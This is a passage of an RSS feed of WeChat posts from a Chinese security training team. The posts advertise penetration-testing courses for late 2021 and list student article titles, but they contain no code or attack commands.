src="https://wechat2rss.xlab.app/img-proxy/?k=9ef4ff43&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyQAWSMBmAX9Eey8XX0F1ibENgibccKibRUKTJ2bRL8PAuS8tsjgR2gLvibQ%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.6163522012578616" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="795" src="https://wechat2rss.xlab.app/img-proxy/?k=d8918914&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRymHaCBuiaibeKeiaqVNt4mswkqyicJt2TicuCGkAo9rR0NSHyUvh1LJIB4lg%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.5453501722158438" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1742" src="https://wechat2rss.xlab.app/img-proxy/?k=84e9745f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRy6xtMTAOaO3Rv9DceR4PBxNN8dnzIU0h6S1NRQlWajurYgBtf5XiaEOQ%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.6302521008403361" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="952" src="https://wechat2rss.xlab.app/img-proxy/?k=fe44f0cf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyvrBlYca7AsviaHg7iapvpj5NsJOwuoJWJ27ur0GmybV3qN2ycEynpEcA%2F640%3Fwx_fmt%3Dpng"/></figure><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">学员文章</section></li></ul></section><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485144&amp;idx=1&amp;sn=a496314f488c5fc5ed555ea6dbdd8130&amp;chksm=fa8b1b40cdfc92567694e85dca4e77f7e7220b866d333c1fb63703868701876fe086a1dacb85&amp;scene=21#wechat_redirect" textvalue="Windows 名称解析机制" data-itemshowtype="0" tab="innerlink" data-linktype="2">Windows 名称解析机制</a></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485292&amp;idx=1&amp;sn=033571585b6565290b17d85d241d50ba&amp;chksm=fa8b1af4cdfc93e23ab0e2f24b86eca5073e62a733dc1ffc82eb87b44f76b87f75ac56174a11&amp;scene=21#wechat_redirect" textvalue="记一次 mssql 注入到 getshell" data-itemshowtype="0" tab="innerlink" data-linktype="2">记一次 mssql 注入到 getshell</a></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485235&amp;idx=1&amp;sn=2b68f16d107880349d9e241f6f03db2a&amp;chksm=fa8b1aabcdfc93bdc2397a4b9143d2a42a626090b574e7c83b3d9f57e88950fa6dfefebf97a3&amp;scene=21#wechat_redirect" textvalue="记一次 weblogic 的域渗透实战" data-itemshowtype="0" tab="innerlink" data-linktype="2">记一次 weblogic 的域渗透实战</a></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485181&amp;idx=1&amp;sn=65ac8c1db32b1e849533438a4d7bba1d&amp;chksm=fa8b1b65cdfc9273e99f90f1446c8a230ad92edfb9e7d75fb8396c9bfbb62db77bdeb3746a04&amp;scene=21#wechat_redirect" textvalue="利用安全描述符隐藏服务后门进行权限维持" data-itemshowtype="0" tab="innerlink" data-linktype="2">利用安全描述符隐藏服务后门进行权限维持</a></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485144&amp;idx=1&amp;sn=a496314f488c5fc5ed555ea6dbdd8130&amp;chksm=fa8b1b40cdfc92567694e85dca4e77f7e7220b866d333c1fb63703868701876fe086a1dacb85&amp;scene=21#wechat_redirect" textvalue="Windows 身份认证" data-itemshowtype="0" tab="innerlink" data-linktype="2">Windows 身份认证</a></p><section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="color: black;padding-right: 10px;padding-left: 10px;line-height: 1.6;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">实战项目</section></li></ul><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">涉密，暂不展示。</p><h2 data-tool="mdnice编辑器" style="font-size: 22px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>联系我们</h2></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.3936170212765957" data-s="300,640" style="" data-type="png" data-w="564" src="https://wechat2rss.xlab.app/img-proxy/?k=e9207b1f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEGnzia9FAtMgeVYJQDibUw6M1Uu0iaB14smHeX2mWfPbc7l4pCZLqokCmiaiaFiavIianxCosOicvZUAUluw%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p>



<p><a href="2247485457">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=6d506593&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUzNTEyMTE0Mw%3D%3D%26mid%3D2247485457%26idx%3D1%26sn%3D8a545fc6473a94a1be0a6efe524c40a4%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sun, 03 Oct 2021 10:30:00 +0800</pubDate>
    </item>
    <item>
      <title>宽字节安全“第二期就业班”重磅来袭！！！</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485454&amp;idx=1&amp;sn=c5f030c4f59b9fd1563b5201da218f69</link>
      <description>&#34;任何职业都可以成为黑客。&#34; ——引自《黑客伦理与信息时代精神》。线下就业班宽字节安全线下就业班 第二期，于</description>
      <content:encoded><![CDATA[<p>
原创 <span>unicodesec</span> <span>2021-10-02 13:04</span> <span style="display: inline-block;"></span>
</p>

<p>"任何职业都可以成为黑客。" ——引自《黑客伦理与信息时代精神》。线下就业班宽字节安全线下就业班 第二期，于</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=3d57459d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyCia1G52RNH1EzyFqbsQSjQtnIYad2mezC1ma24I5N5VLDPYNQl3GHnw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="color: black;padding-right: 10px;padding-left: 10px;line-height: 1.6;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><blockquote data-tool="mdnice编辑器" style="font-size: 0.9em;border-top: none;border-right: none;border-bottom: none;overflow: auto;border-left-color: rgba(0, 0, 0, 0.4);background: rgba(0, 0, 0, 0.05);color: rgb(106, 115, 125);padding: 10px 10px 10px 20px;margin-bottom: 20px;margin-top: 20px;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;color: black;line-height: 26px;">&#34;任何职业都可以成为黑客。&#34; ——引自《黑客伦理与信息时代精神》。</p></blockquote><h4 data-tool="mdnice编辑器" style="font-size: 18px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>线下就业班<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485438&amp;idx=2&amp;sn=ba0c436a8656b65a90a120250a6670be&amp;chksm=fa8b1a66cdfc937075e55cda1a1b3f38b16a8ea6925efcb6dbbdbdc30cd99ff289e0853d2f2e&amp;scene=21#wechat_redirect" textvalue="宽字节安全线下培训班" data-itemshowtype="0" tab="innerlink" style="color: rgb(255, 0, 0);text-decoration: underline;" data-linktype="2"><span style="color: rgb(255, 0, 0);">宽字节安全线下就业班</span></a> 第二期，于 2021 年 11 月 25 号开班。</p><h4 data-tool="mdnice编辑器" style="font-size: 18px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>线上专题班<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485438&amp;idx=3&amp;sn=663da8762314aff8bcf0e359b1107f0f&amp;chksm=fa8b1a66cdfc937008f2d300f78e22b81a04a3ab429e2e1d0ef3931002e09f06ae36abe67231&amp;scene=21#wechat_redirect" textvalue="内网渗透专题班" data-itemshowtype="0" tab="innerlink" style="color: rgb(255, 0, 0);text-decoration: underline;" data-linktype="2"><span style="color: rgb(255, 0, 0);">内网渗透专题班</span></a> ，于 2021 年 11 月 15 号开班。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485438&amp;idx=4&amp;sn=79c3f911a4c077de56163ba30783f0f3&amp;chksm=fa8b1a66cdfc9370d918a50263dabfb359dd77c858ec187816601505dd7bd0e3aea4c59eb77d&amp;scene=21#wechat_redirect" textvalue="JAVA安全专题班 第二期" data-itemshowtype="0" tab="innerlink" style="color: rgb(255, 0, 0);text-decoration: underline;" data-linktype="2"><span style="color: rgb(255, 0, 0);">JAVA安全专题班 第二期</span></a> ，于 2021 年 11 月 15 号开班。</p><h2 data-tool="mdnice编辑器" style="font-size: 22px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>为什么办培训</h2><section style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;text-indent: 2em;">宽字节安全团队自成立以来，一直想做很多事情，例如漏洞挖掘，红蓝对抗，C2开发，漏洞复现等等。但是我们精力有限，所以我们选择全职创业来完成自己的梦想。我们想将我们在一线攻防领域的经验分享给大家。一方面，我们需要培训来积累启动资金，另一方面能通过培训去结识志同道合的伙伴一起做有趣的事。</section><h2 data-tool="mdnice编辑器" style="font-size: 22px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>为什么选择我们</h2><ol data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">宽字节有自己的安全理念，不同于只讲解工具使用的教程，宽字节<strong><span style="color: rgb(255, 0, 0);">更注重原理与基础</span></strong>，万丈高楼平地起，我们将带领学员深入漏洞的本质，探索安全的魅力</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">团队有丰富的红蓝对抗经验，一线红队与安全研究的师傅全程线下授课</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">教学内容通俗易懂，贴合实战，<strong><span style="color: rgb(255, 0, 0);">紧密贴合一线攻防人员的需求</span></strong></section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">宽敞明亮的教室，各种靶机供学员练习，良好的学习氛围</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">大量的信息安全类书籍供学员借阅，内部资料向学员开放</section></li></ol><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">有了 <strong>第一期培训</strong> 的经验，我们重新梳理细化了整个课程体系和教学资料。增加了 <span style="color: rgb(255, 0, 0);"><strong>阶梯性教学</strong> </span>和 <span style="color: rgb(255, 0, 0);"><strong>分班机制</strong></span> 。让基础好的同学能够在学习中沉淀更多东西，基础较弱的同学增加大量基础内容的实战训练，快速提升。让学员在完成培训后，能够深入本质，熟悉漏洞的成因，利用与防护规则。独立完成整个渗透测试流程，积累一定的漏洞分析，内网渗透，域渗透的经验，对安全有自己的认识。</p><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><strong>宽字节安全第一期线下培训已经进行了一半了，来一起看看下线培训的情况吧</strong>。</p><h2 data-tool="mdnice编辑器" style="font-size: 22px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>展示</h2><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">内部 Wiki</section></li></ul><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.5461658841940532" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1917" src="https://wechat2rss.xlab.app/img-proxy/?k=d406714c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyPHTg6VZhU2mvw4Sk0yCr6Plq656Mm96cjYLIFdmZEBu7CibrgkaeA0Q%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.6217783505154639" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1552" src="https://wechat2rss.xlab.app/img-proxy/?k=33dd498c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRy0Z8pWAAv9QsCQsicUdEiaeHMicXm4z2SwicdRjNpttvNcTufnibeibcViaUyg%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.8030203545633617" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1523" src="https://wechat2rss.xlab.app/img-proxy/?k=529ed250&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyZiaTFQRW1ibwibiceUkslVOQgMYJSWXZJVhMF8oy6XEia8fGTeeE6wbZN4w%2F640%3Fwx_fmt%3Dpng"/></figure><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">学习环境</section></li></ul><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.75" style="display: block;margin-right: auto;margin-left: auto;" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=cc930810&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyOekrplmYFPMWyDJvJD2rEOlp6tdYZZaCK1TMwhicktUmSnibb0AVwYCw%2F640%3Fwx_fmt%3Djpeg"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.46171875" style="display: block;margin-right: auto;margin-left: auto;" data-type="jpeg" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=695b456f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyj6Goric360GYf4AA47hXvSSPU4KTCVfvl5Bibs2UN7worfFdRDWkibbmA%2F640%3Fwx_fmt%3Djpeg"/></figure><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">学习氛围</section></li></ul><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.7502287282708143" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1093" src="https://wechat2rss.xlab.app/img-proxy/?k=d94eebef&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyLoWZ6pjiaPHHicLawngSqZnSI1lgBqdYyQoqG17IzkCuSfTyKpXLyBnQ%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.7502287282708143" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1093" src="https://wechat2rss.xlab.app/img-proxy/?k=7aa3ab25&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRysRdcZU4N0lPhpsn5R0pichur2Q4Ty5FUE0xExJ2Ep4EZM8Ra4U2knyw%2F640%3Fwx_fmt%3Dpng"/></figure><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">学员们自行组织相约早晨 7点多 提前到教室学习，学到晚上十点以后走已经成了大家的日常，无任何强制性，全凭大家对网络安全的热爱。</p><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="2.132492113564669" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="317" src="https://wechat2rss.xlab.app/img-proxy/?k=59656361&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRySCgJPadO37ofnkqlAffZBtGtlhOy7LzaiaoVT0edzLo9sfvZFRJ4XFw%2F640%3Fwx_fmt%3Dpng"/></figure><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">学员笔记</section></li></ul><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.39803625377643503" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1324" src="https://wechat2rss.xlab.app/img-proxy/?k=9ef4ff43&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyQAWSMBmAX9Eey8XX0F1ibENgibccKibRUKTJ2bRL8PAuS8tsjgR2gLvibQ%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.6163522012578616" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="795" src="https://wechat2rss.xlab.app/img-proxy/?k=d8918914&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRymHaCBuiaibeKeiaqVNt4mswkqyicJt2TicuCGkAo9rR0NSHyUvh1LJIB4lg%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.5453501722158438" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1742" src="https://wechat2rss.xlab.app/img-proxy/?k=84e9745f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRy6xtMTAOaO3Rv9DceR4PBxNN8dnzIU0h6S1NRQlWajurYgBtf5XiaEOQ%2F640%3Fwx_fmt%3Dpng"/></figure><figure data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-ratio="0.6302521008403361" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="952" src="https://wechat2rss.xlab.app/img-proxy/?k=fe44f0cf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdGW8st3Hh9TvrGKeAlB3YRyvrBlYca7AsviaHg7iapvpj5NsJOwuoJWJ27ur0GmybV3qN2ycEynpEcA%2F640%3Fwx_fmt%3Dpng"/></figure><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">学员文章</section></li></ul></section><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485144&amp;idx=1&amp;sn=a496314f488c5fc5ed555ea6dbdd8130&amp;chksm=fa8b1b40cdfc92567694e85dca4e77f7e7220b866d333c1fb63703868701876fe086a1dacb85&amp;scene=21#wechat_redirect" textvalue="Windows 名称解析机制" data-itemshowtype="0" tab="innerlink" data-linktype="2">Windows 名称解析机制</a></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485292&amp;idx=1&amp;sn=033571585b6565290b17d85d241d50ba&amp;chksm=fa8b1af4cdfc93e23ab0e2f24b86eca5073e62a733dc1ffc82eb87b44f76b87f75ac56174a11&amp;scene=21#wechat_redirect" textvalue="记一次 mssql 注入到 getshell" data-itemshowtype="0" tab="innerlink" data-linktype="2">记一次 mssql 注入到 getshell</a></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485235&amp;idx=1&amp;sn=2b68f16d107880349d9e241f6f03db2a&amp;chksm=fa8b1aabcdfc93bdc2397a4b9143d2a42a626090b574e7c83b3d9f57e88950fa6dfefebf97a3&amp;scene=21#wechat_redirect" textvalue="记一次 weblogic 的域渗透实战" data-itemshowtype="0" tab="innerlink" data-linktype="2">记一次 weblogic 的域渗透实战</a></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485181&amp;idx=1&amp;sn=65ac8c1db32b1e849533438a4d7bba1d&amp;chksm=fa8b1b65cdfc9273e99f90f1446c8a230ad92edfb9e7d75fb8396c9bfbb62db77bdeb3746a04&amp;scene=21#wechat_redirect" textvalue="利用安全描述符隐藏服务后门进行权限维持" data-itemshowtype="0" tab="innerlink" data-linktype="2">利用安全描述符隐藏服务后门进行权限维持</a></p><p style="margin-top: 5px;margin-bottom: 5px;"><a target="_blank" href="http://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485144&amp;idx=1&amp;sn=a496314f488c5fc5ed555ea6dbdd8130&amp;chksm=fa8b1b40cdfc92567694e85dca4e77f7e7220b866d333c1fb63703868701876fe086a1dacb85&amp;scene=21#wechat_redirect" textvalue="Windows 身份认证" data-itemshowtype="0" tab="innerlink" data-linktype="2">Windows 身份认证</a></p><section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="color: black;padding-right: 10px;padding-left: 10px;line-height: 1.6;letter-spacing: 0px;word-break: break-word;overflow-wrap: break-word;text-align: left;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><ul data-tool="mdnice编辑器" style="font-size: 16px;margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-2"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">实战项目</section></li></ul><p data-tool="mdnice编辑器" style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;">涉密，暂不展示。</p><h2 data-tool="mdnice编辑器" style="font-size: 22px;margin-top: 30px;margin-bottom: 15px;font-weight: bold;"><span style="display: none;"></span>联系我们</h2></section><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.3936170212765957" data-s="300,640" style="" data-type="png" data-w="564" src="https://wechat2rss.xlab.app/img-proxy/?k=e9207b1f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FcOCqjucntdEGnzia9FAtMgeVYJQDibUw6M1Uu0iaB14smHeX2mWfPbc7l4pCZLqokCmiaiaFiavIianxCosOicvZUAUluw%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p>



<p><a href="2247485454">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=4a7c195c&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUzNTEyMTE0Mw%3D%3D%26mid%3D2247485454%26idx%3D1%26sn%3Dc5f030c4f59b9fd1563b5201da218f69%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 02 Oct 2021 13:04:00 +0800</pubDate>
    </item>
    <item>
      <title>数字观星国庆POC&amp;指纹活动十一开启！</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485438&amp;idx=1&amp;sn=9dd82465c1a61ddebabf1d7dfd53ec49</link>
      <description>十月一号是祖国成立七十二周年，数字观星携全体员工为庆贺国庆来临开启新一轮的POC&amp;指纹平台活动。</description>
      <content:encoded><![CDATA[<p>
<span>奇点</span> <span>2021-09-30 09:00</span> <span style="display: inline-block;"></span>
</p>

<p>十月一号是祖国成立七十二周年，数字观星携全体员工为庆贺国庆来临开启新一轮的POC&指纹平台活动。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=f2e3ccb1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FcOCqjucntdFqDCgXSBI9BnvLEuibDXNdwbVhf9iblTgs8Wzib57a2uicOWJxnHwibBykeqTHmZv58CiagKkl0wFcBAKw%2F0%3Fwx_fmt%3Djpeg"/>
</p>






<p><a href="2247485438">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=9d066110&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUzNTEyMTE0Mw%3D%3D%26mid%3D2247485438%26idx%3D1%26sn%3D9dd82465c1a61ddebabf1d7dfd53ec49%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 30 Sep 2021 09:00:00 +0800</pubDate>
    </item>
    <item>
      <title>宽字节第二期线下培训开始招生啦！！！</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUzNTEyMTE0Mw==&amp;mid=2247485438&amp;idx=2&amp;sn=ba0c436a8656b65a90a120250a6670be</link>
      <description>线下就业班宽字节安全线下培训班 第二期，于 2021 年 11 月 25 号开班。为什么选择我们宽字节有自己</description>
      <content:encoded><![CDATA[<p>
原创 <span>unicodesec</span> <span>2021-09-30 09:00</span> <span style="display: inline-block;"></span>
</p>

<p>线下就业班宽字节安全线下培训班 第二期，于 2021 年 11 月 25 号开班。为什么选择我们宽字节有自己</p>
<p></p>



<p>
